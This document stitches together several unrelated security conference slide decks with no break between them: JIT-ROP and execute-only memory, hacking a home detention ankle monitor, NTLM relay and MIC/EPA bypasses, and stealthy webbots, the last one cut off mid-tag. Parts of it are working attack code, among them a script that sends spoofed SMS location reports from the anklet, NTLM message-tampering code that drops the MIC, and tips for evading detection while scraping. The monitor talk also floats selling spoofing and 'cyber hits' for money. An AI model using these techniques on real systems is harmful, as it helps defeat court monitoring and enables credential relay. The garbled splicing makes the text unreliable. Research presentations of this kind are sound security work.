1. Map the surrounding 4K page @ 0xdeadb000 and disassemble it:
   ...
   mov eax, [ebp-4]
   mov ebx, [ebp-8]
   add eax, ebx
   push eax
   push ebx
   call 0x64616d6e
   ...
2. Harvest gadgets, then follow every call/jmp target (0x64616d6e leads to
   the 4K page @ 0x64616000) to discover more pages.
3. Repeat until enough gadgets are collected and compile the ROP payload on
   the fly. Fine-grained ASLR alone does not stop this.
The Value of One Pointer?
Volcano and Hobbit: sold separately.
Part V:
Conceal
&
Forget
C++ Virtual Function Tables
Animal → Dog, Animal → Cat

Instance of class Dog: Vtable ptr, Member: name, Member: age, Member: breed
  Vtable: Function ptr: feed(), Function ptr: pet(), Function ptr: sound()
Instance of class Cat: Vtable ptr, Member: name, Member: fav. catnip,
Member: sharp claws?
  Vtable: Function ptr: feed(), Function ptr: pet(), Function ptr: sound()

class Dog : public Animal {
  …
  void sound() {
    printf("Woof!");
  }
  …
}
class Cat : public Animal {
  …
  void sound() {
    printf("Meow!");
  }
  …
}
Knights and Knaves
Instance of class Dog: Vtable ptr, Member: name, Member: age, Member: breed
[Animation builds collapsed: the vtable pointer faces several
identical-looking candidate tables,
  Function ptr? feed() / pet() / sound()   (x3 copies)
and without the ability to read code memory there is no way to tell which
entries are genuine knights and which are knaves.]
Execute Only Memory
Code Ptr: 0xdeadbeef -> 4K page @ 0xdeadb000
...
mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
push eax
push ebx
call 0x64616d6e
...
[Second build collapsed: with execute-only pages the JIT-ROP read of the
code page is denied; the leaked pointer can no longer be dereferenced to
harvest gadgets.]
Necessary vs. Sufficient
● Code reuse requires:
– No ASLR: A priori knowledge of place
– ASLR: A priori knowledge of relative place + runtime
discovery of offset
– FG-ASLR: Runtime discovery of value at discovered
place
● No runtime discovery? No discovery of value or
place and no code to reuse:
– XO-M + FG-ASLR = <3
Elephant in the Room
Two words: memory overhead
https://www.flickr.com/photos/mobilestreetlife/4179063482
Blunting the Edge
● Oxymoron (2014)
  – Key idea: route calls through a segment-relative trampoline table:
    call fs:0x100

mov eax, [ebp-4]
mov ebx, [ebp-8]
add eax, ebx
xor ecx, ecx
push eax
push ebx
push ecx
call fs:0x100

fs segment (starts at a random address):
...
0x108: jmp ...
0x104: jmp ...
0x100: jmp 0xdefc23defc23
0xfc:  jmp ...
...
Xen, Linux, & LLVM
● Xen 4.4 introduced PVH mode (Xen 4.5 → PVH
dom0)
– PVH uses Intel Extended Page Tables for PFN →
MFN translations
– EPT supports explicit R/W/E permissions
● Linux mprotect M_EXECUTE & ~M_READ sets
EPT through Xen
– Xen injects violations into Linux #PF handler
● LLVM for FG-ASLR and execute-only codegen
Part VI:
Closing Thoughts
Takeaways
For mapped pages (X/NX = execute allowed/denied, EPT ~R = EPT read disabled):

Non-Writable       Readable              EPT ~R
  X                Read/Execute          Execute Only
  NX               Read                  Nothing

Writable           Readable              EPT ~R
  X                Read/Write/Execute    Write/Execute
  NX               Read/Write            Write

[Animation builds collapsed; the labels in the original deck map Constant
Data to Read, Stack/Heap/mmap to Read/Write, and Program/Library Code to
Execute Only.]
FIN
● Code: <TBD>
● White Paper: <TBD>
● Email: [email protected]
● Twitter: @dsThyth
● PGP:
– 201a 7b59 a15b e5f0 bc37 08d3 bc7f 39b2 dfc0 2d75 | pdf |
How to hack your way
out of home detention
About me
• William “@Amm0nRa” Turner
• @Assurance
Disclaimer:
• I own this system (and 0wn it)
• The following information is for academic
purposes only
• Don’t use this for evil
• If you do, you may go to jail
Home Detention Systems
• Used to monitor 'low risk' criminals in their
homes. e.g.:
• “Woman gets home detention in ‘green card’
immigration scheme” [October 2014, Los
Angeles]
• Private investigator who “hacked” email gets
3 months jail, 6 months home detention [June
2015, New York]
How home detention
systems work
• Older systems ran over phone lines, used
RF for anklet bracelet proximity
• Newer systems use GPS, cell network as
well as short range RF
In America
• “On a normal day some 200,000 people wake
up with a black plastic box strapped to their
leg” – James Kilgore, 2012
Getting hold of one
• Very hard to even get info
• Social engineered a 'sample' unit out of a Taiwan manufacturing company
for ~$1k - "GWG International Inc"
• Different states/police forces use different trackers; difficult to know
if/where this unit is used in the USA.
• Other trackers probably have at least some of the same vulns
• Lacked detailed manuals - found a car tracking system running the same
'OS' (GS-818 - SAN JOSE TECHNOLOGY, INC)
Getting hold of one
Operation
• GPS for location, home base unit with short range RF,
tamper detection
• Battery life depends on configuration, can be
recharged without removing anklet
• Base unit also has battery to deal with power outages
• Communicates over SMS or GPRS (TCP socket) with
server
• Accepts commands to change settings – username
and password
The System – base unit
The System – base unit
Internals Teardown
Anklet
Anklet:
JTAG Header(?)
Anklet Internals
Cinterion MC551
K9F5608U0D
vibration motor
Anklet Internals
M430F5418
434.01MHz Module
Operation
• Interesting commands/features which can
be set/enabled/triggered:
username
password
network APN
SMS-TCP mode
SMS numbers
status report interval
Geo-Fence coords
buzzer
vibration alert
log to file settings
clear log
fiber optic break detection
reed switch detection
GSM Security
• GSM is encrypted using A5/1 (/2/3)
• Ki embedded in SIM card used to
authenticate SIM, network not
authenticated – well known issue
• Kc is temporary key used to encrypt traffic
• IMEI used as unique ID, phone number only
known by network, not SIM
SDR
• SDR – software defined radio
• BladeRF
YateBTS
• Open source GSM stack – based on
OpenBTS, allows JS scripts to control
network functions
• Can be used to spoof real network. need to
find MCC/MNC of local telcos - illegal
• Faraday cage ($2 roll of tin foil) to block
real telco signal and encourage connecting
to rogue network
MitMing
• If in TCP mode, can simply MitM socket – easy
• If in SMS mode, much harder, but doable
Intercept status
messages
• #username,
$GPRMC,110834.902,V,3750.580,S,14459.1854,E
,0.00,0.00,141014,,*07,ST-1-M27-0-3885mV-50.0
• username – used to auth commands sent to
anklet, sent in status messages
• $GPRMC...*07 is a NMEA standard
“Recommended minimum specific GPS/Transit
data”, GPS cords/timestamp
• 07 is hex checksum on GPS data
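A minimal sketch of recomputing that checksum (the standard NMEA XOR over the bytes between '$' and '*'), which we will need once we start editing the coordinates:

def nmea_checksum(sentence):
    data = sentence.split("$", 1)[1].split("*", 1)[0]
    c = 0
    for ch in data:
        c ^= ord(ch)
    return "%02X" % c

s = "$GPRMC,110834.902,V,3750.580,S,14459.1854,E,0.00,0.00,141014,,*07"
print(nmea_checksum(s))   # recompute and splice in after editing the lat/lng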
Understanding message
• Last part of message: e.g. ST-1-M27-0-
3885mV-50.0
• Not fully decoded, but not required
• Does include: RF beacon code, charging status
• Possibly includes message type, battery
charge, local cell towers
Spoofing SMS
• Many different 'providers'
• costs ~30c per sms
• We will be using smsgang.com
• Must know the number to spoof...
• 3 ways to get it...
Pull SIM card
• Why not just do this normally?
• Replace with another SIM card?
Brute force pin
• Default pin is 0000, start brute force with
dictionary attack
• Need to drop status messages and let anklet
retransmit on real network
• Once pin is found: have full control of device.
To get number, change config to send status to
phone you control
Brute force pin
• Pin must be 4 chars long
• Only allows letters and numbers
• Math.pow(36, 4) == 1,679,616
• “SMS transmission speed of about 30 SMS
messages per minute”
• Around 39 days to try every possible pin
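The arithmetic behind that estimate:

keyspace = 36 ** 4          # 4 chars, letters + digits -> 1,679,616 pins
rate = 30                   # SMS per minute
days = keyspace / rate / 60 / 24
print(days)                 # ~38.9 days for an exhaustive search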
Kraken rainbow tables
• Karsten Nohl (BlackHat 2010)
• Allow reversing Kc of GSM traffic captured from
air using SDR
• Once Kc is known, can decrypt SMS/GPRS/voice
• Can forge messages
• Send forged message to your own phone to get
number
Kraken rainbow tables
• Not able to stop real messages
• But if you have a faraday cage and two SDRs...
• Kc changes often
• Probably have to wait a long time to snoop
command – get pin
“Alcoholics Anonymous”
Live Demo!
• Assume we have the anklet number from one the
attacks I just described
• Faraday cage, spoof network
• Decode message, replace latlngs
• Recalculate checksum, encode
• Script POST to SMS spoof service
• Google map to points, green – delivered to phone,
red – captured by spoofed network
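A hedged sketch of that POST script; smsgang's real endpoint and field names may differ, so treat them as placeholders:

import requests

def send_spoofed_status(monitor_number, anklet_number, body, pincode):
    # sender is spoofed to the anklet's number; recipient is the monitor
    return requests.post("https://www.smsgang.com/api/send",   # assumed URL
                         data={"pincode": pincode,
                               "sender": anklet_number,
                               "number": monitor_number,
                               "message": body})

msg = ("#username, $GPRMC,110834.902,V,3750.580,S,14459.1854,E,"
       "0.00,0.00,141014,,*07,ST-1-M27-0-3885mV-50.0")
# rewrite the lat/lng fields, recompute the *XX checksum, then send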
RF Base Unit
• Uses 434.01 MHz
• Frequency Shift Keying (FSK)
• Heartbeat beacon every 10 seconds
Attacks?
• Static – doesn’t change until rebooted
(unknown: unique to each device?)
• Record base station heartbeat with
hackRF/BladeRF/other SDR, replay
BLACK HAT
• DO NOT USE THIS IN THE REAL WORLD
• YOU WON'T MAKE IT TO JAIL
System detection
• War drive scanning for base unit RF beacons
• Slow/expensive – unless you can detect RF from
a long range. Better to use court
docs/newspapers to get names and dox
• Jam base station, cell, gps – cheap, easy – very
illegal
• Spoof real network and brute force pin, take
control of anklet, impersonate user/ crack Kc,
get number, jam real device, spoof fake coords
BLACKHAT/Monetization
• If people break the rules of their sentence,
they normally go to jail.
• Black mail user? How?
• Sell spoofing device/service
• Do 'cyber hit's on people for a fee
Summary
• Home detention systems have issues
• Could be improved – mutal auth,
encryption
• Can't be improved/hard – jamming, user
locating
Future?
• Try to get code exec from malformed SMS?
• Remove IC, dump ROM and look for bugs/backdoors
• Write software 'emulator' for the anklet – pull SIM
and plug into any smartphone
• Use SDR to spoof GPS – see other talk happening
right now…
• Questions?
• I probably ran out of time, so talk to me later | pdf |
Marina Simakov
Yaron Zinar
ABOUT US
• Senior Security Researcher @Preempt
• M.Sc. in computer science, with several published articles, with a main area of
expertise in graph theory
• Previously worked as a Security Researcher @Microsoft
• Spoke at various security conferences such as Black Hat, Blue Hat IL and DefCon
Marina Simakov (@simakov_marina)
• Senior Security Researcher Lead @Preempt
• M.Sc. in Computer Science with a focus on statistical analysis
• Spent over 12 years at leading companies such as Google and Microsoft
• Among his team latest finding are CVE-2017-8563, CVE-2018-0886, CVE-2019-
1040 and CVE-2019-1019
Yaron Zinar (@YaronZi)
AGENDA
1. Introduction:
§ Common attacks on Active
Directory
§ NTLM
§ Design weaknesses
§ NTLM Relay
§ Offered mitigations
2. Known Vulnerabilities
§ LDAPS Relay
§ CVE-2015-0005
3. New vulnerabilities
§ Your session key is my session
key
§ Drop the MIC
§ EPA bypass
§ Attacking AD FS
§ External lockout bypass
§ Reverse-Kerberoasting
4. Takeaways
INTRODUCTION: ACTIVE DIRECTORY
§ Main secrets storage of the domain
§ Stores password hashes of all accounts
§ In charge of authenticating accounts against domain resources
§ Authentication protocols
§ LDAP
§ NTLM
§ Kerberos
§ Common attacks
§ Golden & Silver Ticket
§ Forged PAC
§ PTT
§ PTH
§ NTLM Relay
NTLM
Authentication is not bound to the session!
(1) NTLM Negotiate
(3) NTLM Authenticate
(2) NTLM Challenge
(4) NETLOGON
(5) Approve/Reject
Client Machine
Server
DC
NTLM RELAY
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
Server
Attacked
Target
DC
NTLM RELAY:
MITIGATIONS
NTLM RELAY: MITIGATIONS
§ Mitigations:
§ SMB Signing
§ LDAP Signing
§ EPA (Enhanced Protection for Authentication)
§ LDAPS channel binding
§ Server SPN target name validation
§ Hardened UNC Paths
NTLM RELAY: MITIGATIONS
§ SMB & LDAP signing
§ After the authentication, all communication between client and server will
be signed
§ The signing key is derived from the authenticating account’s password hash
§ The client calculates the session key by itself
§ The server receives the session key from the DC in the NETLOGON
response
§ An attacker with relay capabilities has no way of retrieving the session key
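For reference, a sketch of the NTLMv2 key material (per MS-NLMP; requires MD4 support in your OpenSSL build). The derivation starts from the NT hash, which a relay attacker never holds:

import hashlib, hmac

def ntowf_v2(password, user, domain):
    nt_hash = hashlib.new("md4", password.encode("utf-16-le")).digest()
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()

def session_base_key(password, user, domain, nt_proof_str):
    # NTProofStr is the HMAC the client sends inside NTLM_AUTHENTICATE
    return hmac.new(ntowf_v2(password, user, domain), nt_proof_str,
                    hashlib.md5).digest()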
NTLM RELAY: MITIGATIONS
§ SMB & LDAP signing
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client
Machine
DC
Server
Attacked
Target
Packet not
signed
correctly
+Session Key
(Hash Derived)
NTLM RELAY: MITIGATIONS
§ EPA (Enhanced Protection for Authentication)
§ RFC 5056
§ Binds the NTLM authentication to the secure channel over which the
authentication occurs
§ The final NTLM authentication packet contains a hash of the target service’s
certificate, signed with the user’s password hash
§ An attacker with relay capabilities is using a different certificate than the
attacked target, hence the client will respond with an incompatible
certificate hash value
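A sketch of how that certificate hash (the channel binding value) is computed; the struct packing is simplified, consult MS-NLMP and RFC 5929 for the exact layout:

import hashlib, struct

def channel_binding_value(cert_der: bytes) -> bytes:
    cert_hash = hashlib.sha256(cert_der).digest()  # RFC 5929 tls-server-end-point
    app_data = b"tls-server-end-point:" + cert_hash
    # gss_channel_bindings_struct: four zeroed address fields, then
    # length-prefixed application data; the MD5 of the whole struct is what
    # lands in the MsvAvChannelBindings av_pair.
    gss = struct.pack("<IIIII", 0, 0, 0, 0, len(app_data)) + app_data
    return hashlib.md5(gss).digest()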
NTLM RELAY: MITIGATIONS
§ EPA (Enhanced Protection for Authentication)
(2) NTLM Negotiate
Client
Machine
DC
Server
Attacked
Target
(5) NTLM Challenge
(6) NTLM Authenticate
User signs the Server’s
certificate
Incorrect
certificate hash!
(1) TLS Session
NTLM RELAY:
KNOWN VULNERABILITIES
NTLM: KNOWN VULNERABILITIES
§ LDAPS Relay (CVE-2017-8563)
§ Discovered by Preempt in 2017
https://blog.preempt.com/new-ldap-rdp-relay-vulnerabilities-in-ntlm
§ Group Policy Object (GPO) - “Domain Controller: LDAP server signing
requirements”
§ Requires LDAP sessions to be signed OR
§ Requires session to be encrypted via TLS (LDAPS)
§ TLS does not protect from credential forwarding!
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ Discovered by Core Security (@agsolino)
§ DC didn’t verify target server identity
§ Allows NTLM Relay even when Signing is required
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
DC
Server
Attacked
Target
(9) NETLOGON
(10) Approve + Session Key
+Session Key
(Hash Derived)
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ NTLM Challenge message:
§ Contains identifying information about the target computer
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005
§ NTLM Authenticate message:
§ User calculates HMAC_MD5 based on the challenge message using his NT Hash
NTLM: KNOWN VULNERABILITIES
§ CVE-2015-0005 – Fix:
§ Microsoft issued a fix in MS15-027
§ The fix validated that the computer
which established the secure
connection is the same as the target
in the NTLM Authenticate request
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
Client Machine
DC
Server
Attacked
Target
(9) NETLOGON
(10) DENY!
+Session Key
(Hash Derived)
Target hostname
mismatch!
NTLM RELAY:
NEW VULNERABILITIES
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ Retrieve the session key for any NTLM authentication
§ Bypasses the MS15-027 fix
§ Drop the MIC
§ Modify session requirements (such as signing)
§ Overcome the MIC protection
§ EPA bypass
§ Relay authentication to servers which require EPA
§ Modify packets to bypass the EPA protection
§ Attacking AD-FS
§ External lockout policy bypass
§ Reverse-Kerberoasting
YOUR SESSION KEY IS MY
SESSION KEY
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ MS15-027 fix validates target NetBIOS name
§ But what if the target NetBIOS name field is missing?
Original challenge:
Modified challenge:
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ The client responds with an NTLM_AUTHENTICATE message with target
NetBIOS field missing
§ The NETLOGON message is sent without this field
§ The domain controller responds with a session key!
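A conceptual sketch of that challenge tampering (AV_PAIR ids per MS-NLMP; parsing simplified):

import struct

def strip_target_names(target_info: bytes, drop=(0x0001, 0x0002)) -> bytes:
    # Strip MsvAvNbComputerName (0x0001) / MsvAvNbDomainName (0x0002) from
    # the TargetInfo block of an NTLM_CHALLENGE so the target-name check
    # has nothing to compare against.
    out, off = b"", 0
    while off + 4 <= len(target_info):
        av_id, av_len = struct.unpack_from("<HH", target_info, off)
        value = target_info[off + 4: off + 4 + av_len]
        if av_id not in drop:
            out += struct.pack("<HH", av_id, av_len) + value
        off += 4 + av_len
        if av_id == 0x0000:   # MsvAvEOL terminates the list
            break
    return out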
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ But what if the NTLM AUTHENTICATE message includes a MIC?
§ MIC: Message integrity for the NTLM NEGOTIATE, NTLM CHALLENGE, and
NTLM AUTHENTICATE
§ MIC = HMAC_MD5(SessionKey, ConcatenationOf(
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE))
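Spelled out as code (note that the MIC field inside NTLM_AUTHENTICATE is zeroed while the hash is computed):

import hashlib, hmac

def compute_mic(session_key, negotiate, challenge, authenticate):
    # 'authenticate' must have its 16-byte MIC field zeroed first
    return hmac.new(session_key, negotiate + challenge + authenticate,
                    hashlib.md5).digest()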
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
§ Overcoming the MIC problem:
§ By removing the target hostname we are able to retrieve the session key
§ We have all 3 NTLM messages
§ The client provides a MIC which is based on the modified NTLM_CHALLENGE
message
§ We recalculate the MIC based on the original NTLM_CHALLENGE message
<RELAYING CREDENTIALS HAS NEVER BEEN EASIER. MARINA SIMAKOV & YARON ZINAR. DEFCON 2019>
NTLM: NEW VULNERABILITIES
§ Your session key is my session key
(1) NTLM Negotiate
(5) NTLM Authenticate
(4) NTLM Challenge
remove target name
Client Machine
DC
Server
Attacked
Target
(6) NETLOGON
(7) Approve + Session Key
+Session Key
(Hash Derived)
NTLM: NEW VULNERABILITIES
§ Your session key is my session key – Fix:
§ Windows servers deny requests which do not include a target
§ Issues:
§ NTLMv1
§ messages do not have av_pairs -> no target field
§ Such authentication requests remain vulnerable to the attack
§ Non-Windows targets are still vulnerable
§ Patching is not enough
DROP THE MIC
NTLM: NEW VULNERABILITIES
§ Drop the MIC
§ MIC = HMAC_MD5(SessionKey, ConcatenationOf(
NTLM_NEGOTIATE, NTLM_CHALLENGE, NTLM_AUTHENTICATE))
§ If client & server negotiate session privacy/integrity, attackers cannot take
over the session
§ The MIC protects the NTLM negotiation from tampering
NTLM: NEW VULNERABILITIES
§ Drop the MIC
§ SMB clients turn on the signing negotiation flag by default & use a MIC
§ It is not possible (or at least, not trivial) to relay SMB to another protocol which
relies on this negotiation flag (in contrast to other protocols such as HTTP)
§ How can we overcome this obstacle?
§ MIC can be modified only if the session key is known
§ Otherwise, it can be simply removed :)
§ [To remove the MIC, the version field must be removed too, along with
some negotiation flags]
§ Result: It is possible to tamper with any stage of the NTLM authentication flow
when removing the MIC
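A simplified sketch of what "removing the MIC" involves (offsets per MS-NLMP; the payload-offset fix-ups that must follow are elided):

# Hypothetical sketch: strip the Version and MIC fields from an
# NTLM_AUTHENTICATE blob and clear the flag that advertises the Version.
NTLMSSP_NEGOTIATE_VERSION = 0x02000000

def drop_mic(auth_msg: bytes) -> bytes:
    msg = bytearray(auth_msg)
    flags = int.from_bytes(msg[60:64], "little")   # NegotiateFlags at offset 60
    flags &= ~NTLMSSP_NEGOTIATE_VERSION            # no Version advertised
    msg[60:64] = flags.to_bytes(4, "little")
    # Version (8 bytes at offset 64) and MIC (16 bytes at offset 72) removed:
    del msg[64:88]
    # ...every payload field's offset descriptor must now be reduced by 24
    return bytes(msg)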
NTLM: NEW VULNERABILITIES
§ Drop the MIC
[Diagram: Drop the MIC relay flow among Client Machine, Attacked Target, Server, and DC: (1) NTLM Negotiate (signing supported), (4) NTLM Challenge (no signing negotiated), (5) NTLM Authenticate (includes MIC)]
§ Drop the MIC - Problem
§ The MIC's presence is signaled in the msvAvFlags attribute of the NTLM
authentication message
§ msvAvFlags is signed with the user’s password hash
§ Even if the corresponding bit is set, the target server does not verify that the
MIC is indeed present
§ MIC bypass - Fix:
§ If msvAvFlags indicate that a MIC is present, verify its presence.
§ Issues:
§ Some clients don’t add a MIC by default (Firefox on Linux or MacOS)
§ These clients are still vulnerable to NTLM session tampering
§ More serious issue: CVE-2019-1166 – Drop The MIC 2 :)
EPA BYPASS
§ EPA (Extended Protection for Authentication) bypass
§ EPA binds authentication packets to a secure TLS channel
§ Adds a Channel Bindings field to the NTLM_AUTHENTICATE message based on the target server certificate
§ Prevents attackers from relaying the authentication to another server
§ Modification requires knowledge of the user's NT HASH
§ EPA (Extended Protection for Authentication) bypass
§ Servers protected by EPA:
§ AD-FS
§ OWA
§ LDAPS
§ Other HTTP servers (e.g. Sharepoint)
§ Unfortunately, EPA is disabled by default on all of the above servers
§ In most cases, these servers are vulnerable to much simpler attack vectors
§ EPA (Extended Protection for Authentication) bypass
§ Modifying the Channel Bindings in the NTLM_AUTHENTICATE message is not possible
§ But what if we add a Channel Bindings field to the NTLM_CHALLENGE message before we send it to the client?
§ EPA (Extended Protection for Authentication) bypass
§ Client will add our crafted field to the NTLM_AUTHENTICATE message!
§ Additional fields would be added to the message, including a second Channel Binding
§ Server takes the first Channel Binding for verification
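To see why the first value wins, here is a minimal AV_PAIR walker (my sketch, not the presenters' code): each entry is a little-endian AvId and AvLen followed by the value, and a naive parser returns the first MsvAvChannelBindings (0x000A) entry it encounters:

import struct

MSV_AV_EOL = 0x0000
MSV_AV_CHANNEL_BINDINGS = 0x000A

def first_channel_binding(av_pairs):
    # Walk the AV_PAIR list and return the first channel binding value found
    offset = 0
    while offset + 4 <= len(av_pairs):
        av_id, av_len = struct.unpack_from("<HH", av_pairs, offset)
        offset += 4
        if av_id == MSV_AV_EOL:
            break
        if av_id == MSV_AV_CHANNEL_BINDINGS:
            return av_pairs[offset:offset + av_len]  # first match wins
        offset += av_len
    return None

# Two channel-binding entries: the attacker-injected one comes first
crafted = (struct.pack("<HH", MSV_AV_CHANNEL_BINDINGS, 16) + b"A" * 16
           + struct.pack("<HH", MSV_AV_CHANNEL_BINDINGS, 16) + b"B" * 16
           + struct.pack("<HH", MSV_AV_EOL, 0))
print(first_channel_binding(crafted))  # b'AAAAAAAAAAAAAAAA'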
§ EPA (Extended Protection for Authentication) bypass
§ What if the NTLM_AUTHENTICATE message includes a MIC?
§ DROP THE MIC!
[Screenshots: Original NTLM_AUTHENTICATE vs. Modified NTLM_AUTHENTICATE]
§ EPA (Extended Protection for Authentication) bypass
[Diagram: EPA bypass relay flow among Client Machine, Attacked Target, Server, and DC: (1) NTLM Negotiate, (4) NTLM Challenge (inject Channel Binding), (5) NTLM Authenticate (rogue Channel Binding, MIC)]
§ EPA bypass - Fix:
§ Servers deny authentication requests which include more than one
channel binding value
§ Issues:
§ Some clients don’t support EPA & don’t add a MIC (Firefox on Linux or
MacOS)
§ These clients are still vulnerable to the EPA bypass
§ One such client is enough to make the entire domain vulnerable
ATTACKING AD-FS
§ AD-FS Architecture
https://www.sherweb.com/blog/office-365/active-directory-federation-services/
§ AD-FS Proxy
§ Open to the internet
§ Easy target for brute-force/password spraying attacks
§ External Lockout Policy
§ Locks the user coming from the external network after exceeding the
Extranet Lockout Threshold
§ Has effect when: Extranet Lockout Threshold < AD Lockout Threshold
§ Prevents brute-force attacks
§ Prevents malicious account lockouts
§ WIA (Windows Integrated Authentication)
§ Use Kerberos or NTLM SSO capabilities to authenticate to AD-FS
§ WIA authentications were accepted by the AD-FS proxy
§ NTLM relay against the AD-FS proxy from the external network
§ NTLM authentications targeted at the AD-FS proxy allowed attackers to bypass
the external lockout policy (CVE-2019-1126)
§ WIA (Windows Integrated Authentication)
§ Kerberos authentications allowed attackers to brute-force the AD-FS service
account’s password
§ Generate service tickets using different passwords and send to AD-FS proxy
§ If the password is successfully guessed -> log into cloud resources with any
desired privileges
§ No logs generated for unsuccessful attempts
§ Reverse-Kerberoasting!
TAKEAWAYS
§ Patch all vulnerable machines!
§ Restrict NTLM usage as much as possible
§ NTLM authentication is susceptible to NTLM relay attacks
§ Always prefer Kerberos usage
§ Disable NTLMv1 in your environment
§ Configure the GPO ‘Network security: LAN Manager authentication level’ to:
‘Send NTLMv2 response only. Refuse LM & NTLM’ (see the sketch after this list)
§ https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
§ Incorporate NTLM relay mitigations:
§ SMB & LDAP signing
§ LDAP channel binding
§ EPA
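As a hedged illustration of the GPO item above: on a single host, that policy maps to the LmCompatibilityLevel registry value (5 = send NTLMv2 response only, refuse LM & NTLM), which can be set programmatically along these lines (Windows only, run as Administrator, and verify against your own baseline before deploying):

import winreg  # Windows-only standard library module

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"

# LmCompatibilityLevel = 5 corresponds to
# "Send NTLMv2 response only. Refuse LM & NTLM"
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_KEY, 0, winreg.KEY_SET_VALUE) as key:
    winreg.SetValueEx(key, "LmCompatibilityLevel", 0, winreg.REG_DWORD, 5)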
CREDITS
§ The Preempt Research Team
§ Eyal Karni (@eyal_karni)
§ Sagi Sheinfeld
§ Alberto Solino (@agsolino)
§ Attack implementations for some of the vulnerabilities are merged into impacket!
§ https://github.com/SecureAuthCorp/impacket
THANK YOU!
What we'll cover
How online intelligence gathering differs from
traditional intelligence gathering
The difference between intelligence and
espionage
Corporate “Dashboards”
Tips from the field
Opportunities for the community
Who am I?
[email protected]
Minneapolis-based consultancy:
Michael Schrenk Ltd. (www.schrenk.com)
Write Webbots and Spiders for corporate clients
DEFCON X, “Introduction to Writing Spiders
and Web Agents”.
Also write, speak and teach
Intelligence = Information
In a business sense, you want to know:
What can you learn about your competition?
What do people know about you?
Are people stealing from you?
The most important thing is...
What can you predict?
Collect library of information
Compare changes
Definitions
Intelligence is not necessarily:
Espionage
spying,
launching trojans
Wiretapping
A covert action
Tampering with a situation to change:
A Strategy
An Election
Traditional sources for
collecting corporate intel
Go to conferences,
Hire your competition's employees,
Lookup patent records,
Use secret shoppers,
Study help wanted ads,
Read trade publications,
Talk to vendors
Disadvantages of
Traditional corporate intel
Mostly after-the-fact
Requires contact
Mostly one-time activities—must be repeated
Cannot be done anonymously
Can be expensive
Gathering online intel
means learning new habits
Web agents determine how you use the Internet
Browsers
Mail clients
News readers
Telnet
Competitive advantages come when you
perform better and differently.
Webbots/Spiders
Advantages of online
corporate intelligence
Can be done from a distance (with stealth)
Can be automated
Can be done anonymously (for the most part)
Reduces or eliminates latency between when an event
happens and a decision can be made
Can be interactive
Can create relevance that traditional
methods cannot
Online Corporate Intel most
effective when...
It is automated
Data can be parsed and stored in a database
Stores data over a period of time
Creates context by combining various data from a
variety of sources
Uses statistical analysis to make
recommendations
Allows user to configure
Creating relevance
Cross reference multiple sources
Gather information periodically over time
Trend analysis
Show relationships between data
Online intelligence applications can
automate the evaluation process
(Some) sources for
online intelligence
Corporate web sites
Job postings
Product pricing
News
Government web sites
Court records
SEC filings
Patent records
Census data
(More) sources for online
intelligence
Online auctions
– What's a good buy?
– What's a good selling price?
Whois servers
News servers
HTTP headers
Mail
Technology
(the basics of collecting and
using intelligence in three steps)
Identify sources, write bots and store data
Write a data-driven web site for the customer of the data
Create a scheduler for the webbots and spiders
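As a minimal sketch of step one (my illustration, not Schrenk's code; the URL, table layout, and price format are invented), a webbot that fetches a page, extracts a price, and stores it with a timestamp might look like:

import re
import sqlite3
import time
import urllib.request

db = sqlite3.connect("intel.db")
db.execute("CREATE TABLE IF NOT EXISTS prices (fetched_at REAL, url TEXT, price REAL)")

def fetch_price(url):
    # Download a page and pull out the first dollar amount found
    html = urllib.request.urlopen(url).read().decode("utf-8", errors="replace")
    match = re.search(r"\$(\d+\.\d{2})", html)
    return float(match.group(1)) if match else None

url = "http://www.example.com/widget"  # hypothetical target page
price = fetch_price(url)
if price is not None:
    db.execute("INSERT INTO prices VALUES (?, ?, ?)", (time.time(), url, price))
    db.commit()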
Simple examples
Corporate Intelligence
“Dashboards”
Provide “big picture” of data within some
defined context
Adds context to data
Filters
Statistics
Show trends
Creates branding opportunities
Mail example
(Are people stealing from you?)
Policing the Internet
Problem:
People steal things and want to liquidate
them quickly.
Online auctions are an attractive
alternative to pawn shops.
Policing the Internet
(continued)
Solution:
Create an online interface that allows law
enforcement to enter groups of items
stolen at the same time and place.
Write webbots that look for individuals selling similar groupings from similar places on online auctions.
What are people reading?
What are employees of
Apple Computer reading?
1. Mac OS X in a nutshell
2. Mac OS X Hacks
3. Mac OS X: The Missing Manual
4. Pattern Recognition
5. Harry Potter and the Order of the Phoenix
6. What should I do with My Life?
Interactive Intelligence
Sniping agents:
Software that places last-second bids on
online auctions.
Prevents the bidding process from raising
the auction prices.
Somewhat limited by proxy
bidding
Interactive Intelligence
Intelligent shopping software:
Webbots collect market information on
select items.
When an item meets criteria (determined
by collected market intelligence) those
items are either automatically
purchased or recommended for
purchase.
Stocks, online auctions, etc.
Online Sources
Respect their bandwidth
Be as stealthy as you can
Tips on writing stealthy
bots and spiders
Treat bandwidth with respect
(But don't forget to download both HTML & images)
Introduce randomness
Change your start times
Randomize time periods between downloads
Randomize sequence of page downloads
Rotate IP addresses
Use a “link proxy”
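A quick sketch of the randomness tips above (again my own illustration, not code from the talk): shuffle the page order and sleep a random interval between requests so the traffic pattern doesn't look machine-generated:

import random
import time
import urllib.request

pages = [
    "http://www.example.com/products",
    "http://www.example.com/jobs",
    "http://www.example.com/news",
]  # hypothetical targets

random.shuffle(pages)  # randomize the sequence of page downloads
for url in pages:
    urllib.request.urlopen(url).read()
    time.sleep(random.uniform(30, 300))  # randomize time between downloads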
Destroying the REFERER
Interfacing to the link proxy
Change links from:
<a
